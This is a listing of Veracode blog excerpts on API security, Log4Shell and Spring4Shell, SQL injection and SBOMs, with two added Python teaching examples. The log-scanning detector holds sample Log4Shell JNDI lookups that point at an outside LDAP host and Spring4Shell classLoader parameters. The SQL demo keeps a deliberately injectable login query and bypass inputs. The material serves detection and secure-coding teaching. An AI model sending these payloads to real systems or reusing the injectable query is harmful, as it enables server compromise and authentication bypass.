Veracode.webp 2022-04-06 12:25:23 Testing OWASP's Top 10 API Security Vulnerabilities (Part 1) (direct link) Application Programming Interface (API) attacks are set to become one of the most prevalent cyberattacks with a broad target range. By nature, APIs expose application logic and sensitive data such as personally identifiable information (PII), which makes them a target for attackers. In 2019, Gartner predicted that API abuse would become the most common form of cyberattack by 2022. So how can teams stay ahead of API attacks? One answer is by implementing a strong API security strategy that focuses on developer education. Upskilling developers is a key part of a strong API security strategy. API security strategies help organizations focus on solutions to understand and mitigate the unique vulnerabilities and security risks of APIs. When designing an API security strategy, it's imperative to look at the experience and training of the developers and determine what they know about API security. Developers are the key to quality – they're building and fixing applications that we…
Veracode.webp 2022-04-01 19:51:15 Spring4Shell Vulnerability vs Log4Shell Vulnerability (direct link) On March 29, 2022, details of a zero-day vulnerability in Spring Framework (CVE-2022-22965) were leaked. For many, this is reminiscent of the zero-day vulnerability in Log4j (CVE-2021-44228) back in December 2021. What is the difference between the vulnerabilities? The Spring Framework vulnerability was caused by unforeseen access to Tomcat's ClassLoader as a result of the Module feature added in Java 9. The access could potentially allow an attacker to write a malicious JSP file accessible via the application server. On the other hand, the Log4j vulnerability was the result of an exploitable logging feature. If the logging feature is successfully exploited on your infrastructure, attackers can perform an RCE (Remote Code Execution) attack and compromise the affected server. What is the scope of the vulnerabilities? Since we are a cloud-based Software Composition Analysis (SCA) provider, we are able to leverage data on the scope of the vulnerabilities. As we… Vulnerability
Veracode.webp 2022-03-31 12:15:17 (Déjà vu) Spring Framework Remote Code Execution (CVE-2022-22965) (direct link) Details of a zero-day vulnerability in Spring Framework were leaked on March 29, 2022 but promptly taken down by the original source. Although much of the initial speculation about the nature of the vulnerability was incorrect, we now know that the vulnerability has the potential to be quite serious depending on your organization's use of Spring Framework. The vulnerability has been assigned CVE-2022-22965. We will keep this blog updated as new information comes up. Technical summary: the cause was initially rumored to be related to deserialization, but the actual cause is unforeseen access to Tomcat's ClassLoader as a result of the Module feature added in Java 9. An existing mitigation only blocked access to the classLoader property of Class objects, but the Module object (reachable from a Class via its module property) also has a classLoader property and was therefore accessible through Spring's property bindings, as the path class.module.classLoader, when a Java object is bound to a request parameter. Access to the classLoader… Vulnerability ★★★★
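Both vulnerabilities compared in the entries above leave request-side traces that a detection pass can pick up: Log4Shell arrives as a ${jndi:...} lookup in any field the application logs, and Spring4Shell arrives as a request parameter whose name walks class.module.classLoader (or the older class.classLoader path that the earlier mitigation blocked). The following is an added example, not Veracode's tooling: it parses combined-style access-log lines, percent-decodes repeatedly (double encoding is a common filter bypass), scans path, referer and User-Agent for the JNDI lookup or a nested ${${...}} lookup, and inspects parameter names for the classLoader binding path. The log lines are constructed, the log format is an assumption of the example, and the JNDI lookup syntax is the public CVE-2021-44228 vector rather than something the posts above spell out.

```python
"""Detection pass over web access-log lines for Log4Shell and Spring4Shell
indicators. Added example, not Veracode's tooling; log lines are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed log format: Apache/nginx combined-style.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Log4Shell (CVE-2021-44228): a JNDI lookup evaluated by the logging feature.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Nested lookups such as ${${lower:j}ndi:...} are the usual way to hide "jndi".
NESTED_LOOKUP_RE = re.compile(r"\$\{[^}]*\$\{")
# Spring4Shell (CVE-2022-22965): a bound parameter *name* that reaches a
# classLoader through class.module.classLoader or the older class.classLoader.
CLASSLOADER_PATH_RE = re.compile(r"(^|\.)class\.(module\.)?classloader(\.|$)", re.IGNORECASE)


def deep_unquote(value, rounds=3):
    """Percent-decode until stable (bounded), so %2524 -> %24 -> $ is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return a list of (indicator, evidence) tuples for one access-log line."""
    match = LOG_RE.match(line)
    if not match:
        return [("unparsed", line[:80])]
    hits = []
    # Log4Shell payloads can land in any logged field: path, query, referer, UA.
    for field in ("target", "referer", "ua"):
        value = deep_unquote(match.group(field))
        if JNDI_RE.search(value):
            hits.append(("log4shell-jndi", value))
        elif NESTED_LOOKUP_RE.search(value):
            hits.append(("log4shell-nested-lookup", value))
    # Spring4Shell binding is driven by the parameter name, not its value.
    query = urlsplit(deep_unquote(match.group("target"))).query
    for name, _ in parse_qsl(query, keep_blank_values=True):
        if CLASSLOADER_PATH_RE.search(name):
            hits.append(("spring4shell-classloader-binding", name))
    return hits


def scan(lines):
    """Classify every line; the result list is aligned with the input."""
    return [classify(line) for line in lines]


# Constructed log lines (RFC 5737 documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:03:14:15 +0000] "GET /login?user=${jndi:ldap://203.0.113.9/a} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '203.0.113.7 - - [10/Dec/2021:03:14:16 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:ldap://203.0.113.9/b}"',
    '198.51.100.4 - - [31/Mar/2022:09:00:01 +0000] "GET /orders?class.module.classLoader.DefaultAssertionStatus=nonsense HTTP/1.1" 400 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [31/Mar/2022:09:00:02 +0000] "GET /orders?class.classLoader.DefaultAssertionStatus=nonsense HTTP/1.1" 400 0 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [31/Mar/2022:09:05:00 +0000] "GET /orders?page=2&sort=classic&class_id=3 HTTP/1.1" 200 2048 "https://example.test/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line, hits in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        print(hits or "clean", "<-", line[:70])
```

The benign last line, with parameter names like class_id and a value of classic, produces no hit, because the Spring check demands the literal dotted path rather than the substring "class". The nested-lookup pattern is deliberately broad; the Log4j lookup syntax allows far more obfuscation than this, so treat a miss as absence of evidence, not evidence of absence, and patch on the SBOM finding rather than on log silence.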
Veracode.webp 2022-03-29 14:02:48 The Public Sector Has the Highest Proportion of Security Flaws of Any Industry (direct link) We recently launched the 12th annual edition of our State of Software Security (SOSS) report. To draw conclusions for the report, we examined the entire history of active applications. For the public sector data, we took the same approach. We examined the entire history of applications for government agencies and educational institutions. We found that the public sector has the highest proportion of security flaws of any industry. On average, most industries have flaws in approximately 76 percent of their applications – but the public sector figure is 82 percent, six percentage points (roughly 8 percent) higher. As the report's figure shows, the public sector also has a lower-than-average proportion of flaws actually fixed, and it takes significantly longer to remediate flaws. Let's dig a bit deeper into the remediation of open-source flaws. Remediating open-source flaws appears to take a while for every industry. In fact, for most industries, 30 percent of vulnerable libraries remain unresolved… ★★
Veracode.webp 2022-03-22 17:35:44 Shifting Log4j Discovery Right (direct link) You hear a lot about shifting your application security (AppSec) left – in other words, shifting AppSec to the beginning of the software development lifecycle (SDLC). While we firmly believe that you should continue scanning in development environments, that doesn't mean that you should neglect applications that have been deployed to or staged in runtime environments. Runtime presents a unique set of challenges – misconfigurations, logic errors and the like that can't be identified in a static or third-party scan. If you aren't testing for vulnerabilities at runtime, you are risking a potential breach of a different kind. As Chris Wysopal, our co-founder and CTO, recently emphasized: in a shift-left world, shifting right is more important than ever. There are many examples that warrant shifting both left and right. Consider the recent zero-day vulnerability in Log4j 2.x reported on December 9, 2021. Log4j is a Java-based logging utility used by developers to keep track of what… Vulnerability
Veracode.webp 2022-03-15 09:58:36 Veracode Announces Significant Growth Investment From TA Associates (direct link) I am pleased to share the exciting news that TA Associates (“TA”), a leading global growth equity firm, has signed an agreement to make a strategic growth investment in Veracode, taking a majority equity position in the business. Thoma Bravo will also continue to be an investor alongside TA. This new partnership is forming at a critical moment in the evolution of the software security market. Enterprises across all industry verticals need a platform and a partner that can help them secure the software that runs our world. We are excited to partner with TA and Thoma Bravo to do exactly that for our customers and deliver the best outcomes for both their development and security teams. Today's news represents another step on the journey that began even before Veracode was incorporated, when Weld Pond, our founder and CTO Chris Wysopal, and his colleagues at L0pht testified to the US Congress about the need to secure software. Since our founding, Veracode has consistently led the way to… Guideline
Veracode.webp 2022-03-02 18:29:20 Veracode Achieves AWS Security Competency Status (direct link) We are proud to announce that we have recently achieved AWS Security Competency Partner status. This status exemplifies our technical expertise and dedication to helping customers secure their software at every stage of cloud adoption. “Veracode has been partnering with AWS for years. In fact, we also recently received our AWS DevOps Competency status for our demonstrated expertise in delivering DevOps solutions on the AWS Cloud. We trust the security and reliability of AWS and, now that we have achieved the AWS Security Competency status, we are proud to say that AWS trusts the security and reliability of Veracode. Together, we can help customers change the world with innovative cloud-based software,” said Dave Grazio, Senior Director of Partner Marketing at Veracode. As an AWS Security Competency Partner, we offer security-focused solutions to meet a wide variety of workloads and use cases. And since we're cloud-based, you can easily deploy our solutions in a matter of minutes.…
Veracode.webp 2022-02-28 17:04:51 New in Security Labs: Kotlin & Swift Mobile Courses (direct link) Secure coding with Kotlin & Swift: this week we've added new Kotlin & Swift courses to the Security Labs catalog! The update includes 4-5 Kotlin (Android) labs and 4 Swift (iOS) labs that cover common mobile security topics such as secret storage, authorization, and custom URL handling. Developers (and anyone curious about how to write secure code) can now try out hands-on exercises in real applications that highlight coding mistakes that can lead to security vulnerabilities, as well as the steps to take to avoid and/or fix them. What is Kotlin? Kotlin is an open-source, statically typed programming language developed by JetBrains and designed for the JVM, Android, JavaScript, and native targets. Kotlin combines object-oriented and functional constructs, focusing on interoperability, safety, clarity, and tooling support, and can be used for any kind of development, be it server-side, client-side web, or Android. It tends to be more concise, so if you're looking to cut down on the number… Guideline
Veracode.webp 2022-02-17 12:24:35 SQL Injection in Today's Landscape (direct link) What is SQL injection? A SQL injection flaw allows an attacker to modify or inject SQL syntax into a request so that the application behaves in a manner that was not initially intended. In other words, an attacker can change a database query to: read sensitive data; modify the database; execute other database functions; break authentication; or, depending on the database and its configuration, lead to remote code execution. Now that almost all web applications integrate with databases in some way, this flaw has the potential to arise often. However, many frameworks and libraries are available to make database connections and queries safe. That said, SQL injection still exists and is very common. Injection was the number one category (A1) in the OWASP Top 10 2017, and it currently holds the number three spot (A03) in the OWASP Top 10 2021. SQL injection flaws have impacted every industry, including enterprises that already have a mature information security program in place. It can happen, and it can be catastrophic! How… Guideline
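The entry above names the outcomes (read sensitive data, break authentication) and the fix (libraries that make queries safe) without showing either. The following is an added example, not code from the post: a login lookup built by string formatting beside the same lookup using driver placeholders, run against an in-memory SQLite database with constructed rows, plus the case placeholders cannot cover, a user-chosen column name, handled with an allow-list. The users table, its rows and the function names are hypothetical.

```python
"""SQL injection: string-built query beside its parameterized fix.

Added example, not from the post. In-memory SQLite with constructed rows; the
users table and the login functions are hypothetical.
"""
import sqlite3

SORTABLE_COLUMNS = {"username", "role"}  # allow-list for identifiers


def make_db():
    """Constructed sample data; password hashes are placeholder strings."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [("alice", "hash-of-alice-pw", "admin"), ("bob", "hash-of-bob-pw", "user")],
    )
    return conn


def login_vulnerable(conn, username, password_hash):
    """Attacker-controlled input is concatenated straight into SQL syntax."""
    query = ("SELECT username, role FROM users WHERE username = '"
             f"{username}' AND password_hash = '{password_hash}'")
    return conn.execute(query).fetchall()


def login_fixed(conn, username, password_hash):
    """Placeholders ship values separately from the statement; the driver never
    treats them as syntax, so quotes or comment markers in the input stay data."""
    query = "SELECT username, role FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchall()


def list_users(conn, sort_column):
    """Identifiers (table/column names) cannot be bound as parameters, so the
    only safe option is to accept them from a fixed allow-list."""
    if sort_column not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_column!r}")
    query = f"SELECT username FROM users ORDER BY {sort_column}"
    return [row[0] for row in conn.execute(query).fetchall()]


if __name__ == "__main__":
    db = make_db()
    # Authentication bypass: the comment marker swallows the password check.
    print("vulnerable:", login_vulnerable(db, "alice' --", "wrong"))
    print("fixed:     ", login_fixed(db, "alice' --", "wrong"))
    # Sensitive-data read: a tautology turns a one-row lookup into a table dump.
    print("vulnerable:", login_vulnerable(db, "bob", "x' OR '1'='1"))
    print("fixed:     ", login_fixed(db, "bob", "x' OR '1'='1"))
```

With the input alice' -- the vulnerable query becomes ... username = 'alice' --' AND password_hash = 'wrong', and SQLite treats everything after the comment marker as dead text, so the admin row comes back without a password; the parameterized form returns nothing because the quote and the comment marker are compared as literal characters of a username. The tautology input shows the read-sensitive-data case: one lookup returns every row. The third function is the caveat practitioners trip over most: placeholders protect values only, so anything that lands in identifier position (ORDER BY, table names) has to be constrained by an allow-list rather than escaped.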
Veracode.webp 2022-02-14 12:19:04 (Déjà vu) What Is an SBOM and Why Do You Need One? (direct link) SBOM stands for Software Bill of Materials. Before we jump into definitions, let's quickly recap how we got here. Over the last few years, the way we build software has changed drastically. With the increasing need to move faster and release more frequently, organizations are opting to get rid of monolithic architectures and adopt a microservices architecture for greater agility, resiliency, and efficiency. Developers are now able to use more third-party resources and containers to piece together best-of-breed parts for their applications to run on. As a result, less of the code that makes up an application is owned and managed directly by that organization. Unfortunately, it's difficult to get full transparency into all these pieces, since the decision-making and documentation can happen in numerous places across an organization. The lack of a concrete way to determine all the components of an application introduces substantial cybersecurity risks,… ★★★
Last update at: 2024-05-16 06:07:47